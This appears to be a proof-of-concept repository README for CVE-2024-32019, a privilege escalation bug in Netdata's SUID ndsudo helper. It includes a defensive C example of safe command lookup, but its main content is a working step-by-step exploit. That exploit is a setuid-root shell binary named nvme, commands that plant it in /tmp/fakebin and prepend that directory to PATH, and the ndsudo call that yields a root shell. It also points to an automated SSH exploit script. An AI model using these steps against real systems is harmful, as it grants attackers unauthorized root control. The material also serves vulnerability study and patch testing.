Related vulnerability
Description
CVE-2024-32019 is a high-severity local privilege escalation vulnerability in Netdata (versions >= 1.44.0-60 < 1.45.3), caused by insecure use of the PATH variable in the ndsudo SUID binary, allowing attackers to execute arbitrary commands as root.
Introduction
# 🚨 CVE-2024-32019 - Netdata `ndsudo` PATH Vulnerability Exploit (LPE to Root)
A Python-based exploit for **CVE-2024-32019**, a high-severity Local Privilege Escalation vulnerability in the **Netdata Agent**, leveraging a misconfigured SUID binary (`ndsudo`) that fails to securely handle the `PATH` environment variable.
---
> [!Caution]
> This code is for **educational and authorized testing purposes only**. Unauthorized use of this tool against systems you do not own or have explicit permission to test is **illegal**.
## 🔍 Overview
**CVE ID**: CVE-2024-32019
**CVSS Score**: 8.8 (High)
**Disclosed**: April 12, 2024
**Component**: Netdata Agent
**Affected Versions**:
- `>= v1.45.0, < v1.45.3`
- `>= v1.44.0-60, < v1.45.0-169`
---
## 🧠 Technical Summary
Netdata’s `ndsudo` tool is a **SUID root binary** intended to securely execute a limited set of system commands (like `nvme`) on behalf of non-root users.
However, due to an implementation flaw, it **honors the user-controlled `PATH` variable** when resolving command binaries. If an attacker can manipulate the `PATH` to include a writeable directory containing a **malicious binary**, `ndsudo` will execute it with root privileges — resulting in a **local privilege escalation**.
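The lookup a SUID helper can perform instead, as an added defensive example (not Netdata's code and not a description of its actual fix): the command name is resolved only inside a fixed directory list, `PATH` is never consulted, and the candidate must be owned by the expected uid and not writable by group or others. The function name `resolve_trusted` and the directory allowlist are assumptions, and the listed directories are assumed to be root-owned.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Added illustration, not Netdata's code. Resolve `cmd` only inside the
 * caller-supplied trusted directories; the PATH environment variable is
 * never consulted. Returns 0 and fills `out` on success, -1 otherwise. */
int resolve_trusted(const char *cmd, const char *const *dirs, size_t ndirs,
                    uid_t owner, char *out, size_t outlen)
{
    struct stat st;

    /* Bare command names only: no empty names, no path separators. */
    if (cmd == NULL || *cmd == '\0' || strchr(cmd, '/') != NULL)
        return -1;

    for (size_t i = 0; i < ndirs; i++) {
        int n = snprintf(out, outlen, "%s/%s", dirs[i], cmd);
        if (n < 0 || (size_t)n >= outlen)
            continue;                       /* path would be truncated */
        if (stat(out, &st) != 0 || !S_ISREG(st.st_mode))
            continue;                       /* missing or not a regular file */
        if (st.st_uid != owner)
            continue;                       /* not owned by the trusted uid */
        if (st.st_mode & (S_IWGRP | S_IWOTH))
            continue;                       /* writable by group or others */
        if (!(st.st_mode & S_IXUSR))
            continue;                       /* not executable */
        return 0;
    }
    if (outlen > 0)
        out[0] = '\0';
    return -1;
}

int main(void)
{
    /* Hypothetical allowlist; a real helper would compile in its own. */
    static const char *const dirs[] = { "/usr/sbin", "/usr/bin", "/sbin", "/bin" };
    char path[4096];
    if (resolve_trusted("nvme", dirs, 4, 0, path, sizeof path) == 0)
        printf("would exec %s with a reset environment\n", path);
    else
        puts("nvme not found in trusted directories; refusing to run");
    return 0;
}
```

A helper built this way would pass the resolved absolute path to `execve` with a minimal environment rather than calling `execvp` on the bare name.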
---
## 💥 Manual Exploitation Steps
The following steps demonstrate how to manually exploit the vulnerability in `ndsudo`.
### 1. Create a Privilege Escalation Binary
Save the following C code as `nvme.c`:
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
```
### 2. Compile the Exploit
```bash
gcc nvme.c -o nvme
```
### 3. Prepare the Exploit Environment on the Target
```bash
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
```
### 4. Modify the `PATH`
```bash
export PATH=/tmp/fakebin:$PATH
which nvme
# Output: /tmp/fakebin/nvme
```
### 5. Trigger the Exploit
```bash
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
```
If successful, you'll get a root shell.
```bash
# whoami
root
```
## Automatic Exploitation
If you have SSH access, you can use `CVE-2024-32019-dbs.py` to automate this.

## 📎 References
- [GitHub Security Advisory](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
- [CVSS Score: 8.8 (High)](https://nvd.nist.gov/vuln/detail/CVE-2024-32019)
- [CVE-2024-32019: Netdata vulnerability analysis and mitigation](https://www.wiz.io/vulnerability-database/cve/cve-2024-32019)
File snapshot
[4.0K] /data/pocs/7aa722bd1472cb681ee868e1183b2f4a31cf49dc
├── [9.5K] CVE-2024-32019-dbs.py
├── [4.0K] images
│ └── [203K] image.png
└── [2.6K] README.md
1 directory, 3 files